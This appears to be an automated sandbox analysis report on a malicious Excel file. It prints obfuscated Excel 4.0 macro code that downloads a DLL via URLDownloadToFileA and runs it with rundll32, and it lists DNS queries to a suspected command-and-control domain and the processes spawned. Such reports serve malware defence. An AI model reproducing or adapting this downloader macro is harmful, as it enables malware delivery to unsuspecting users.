                  Changed Hyperlinks:False
                  Application Version:917504

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.318330155209
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9f 00 00 00 02 00 00 00 e3 04 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.253094628
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . { . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 78310
                  General
                  Stream Path:Workbook
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:78310
                  Entropy:3.6159661459
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  ,,,,,,,,,,,,,,,egist,,,,,,,,,,,,,,,,,,erServer,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\nxckew.wle,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nlo,adTo,,,,,,,,,,,,,,,,,Fi,le,,,,,,,,,,,,,,,,,Dow,,,,,,,,,,,,,,,,,,U,R,,,,,,"=FORMULA.FILL(before.2.2.29.sheet!AR19&""2 "",AD15)","=FORMULA.FILL(before.2.2.29.sheet!AS19,AE15)","=FORMULA.FILL(before.2.2.29.sheet!AU14,AF15)","=FORMULA.FILL(AS3&AS4,AG15)",,,,,,,,,,,,,,UR,LMon,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),=AG14(),=AL19(),,,,,,,,,,,,,,,,,=before.2.2.29.sheet!AL24(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AF15&AV14,AO13&AP13&""L""&AO12&AO10&AP10&AO11&AP11&""A"",AN19&AN20,0,Doc2!AA100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AS8,0)",,JJC,,,,rundll3,",DllR",,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AD15&before.2.2.29.sheet!AS8&before.2.2.29.sheet!AE15&AG15)",,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  06/11/21-12:05:59.991593ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                  06/11/21-12:06:01.008111ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                  06/11/21-12:06:03.025969ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jun 11, 2021 12:05:54.909857035 CEST5219753192.168.2.228.8.8.8
                  Jun 11, 2021 12:05:55.921636105 CEST5219753192.168.2.228.8.8.8
                  Jun 11, 2021 12:05:56.936053038 CEST5219753192.168.2.228.8.8.8
                  Jun 11, 2021 12:05:58.948674917 CEST5219753192.168.2.228.8.8.8
                  Jun 11, 2021 12:05:58.979480982 CEST53521978.8.8.8192.168.2.22
                  Jun 11, 2021 12:05:59.990859985 CEST53521978.8.8.8192.168.2.22
                  Jun 11, 2021 12:06:01.005148888 CEST53521978.8.8.8192.168.2.22
                  Jun 11, 2021 12:06:03.025798082 CEST53521978.8.8.8192.168.2.22

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Jun 11, 2021 12:05:59.991592884 CEST192.168.2.228.8.8.8d00d(Port unreachable)Destination Unreachable
                  Jun 11, 2021 12:06:01.008111000 CEST192.168.2.228.8.8.8d00d(Port unreachable)Destination Unreachable
                  Jun 11, 2021 12:06:03.025969028 CEST192.168.2.228.8.8.8d00d(Port unreachable)Destination Unreachable

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jun 11, 2021 12:05:54.909857035 CEST192.168.2.228.8.8.80x8c10Standard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                  Jun 11, 2021 12:05:55.921636105 CEST192.168.2.228.8.8.80x8c10Standard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                  Jun 11, 2021 12:05:56.936053038 CEST192.168.2.228.8.8.80x8c10Standard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)
                  Jun 11, 2021 12:05:58.948674917 CEST192.168.2.228.8.8.80x8c10Standard query (0)cyh26wcekai02atpeax.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jun 11, 2021 12:05:58.979480982 CEST8.8.8.8192.168.2.220x8c10Server failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                  Jun 11, 2021 12:05:59.990859985 CEST8.8.8.8192.168.2.220x8c10Server failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                  Jun 11, 2021 12:06:01.005148888 CEST8.8.8.8192.168.2.220x8c10Server failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)
                  Jun 11, 2021 12:06:03.025798082 CEST8.8.8.8192.168.2.220x8c10Server failure (2)cyh26wcekai02atpeax.comnonenoneA (IP address)IN (0x0001)

                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:12:05:49
                  Start date:11/06/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ff30000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:12:05:57
                  Start date:11/06/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\nxckew.wle,DllRegisterServer
                  Imagebase:0xff6a0000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >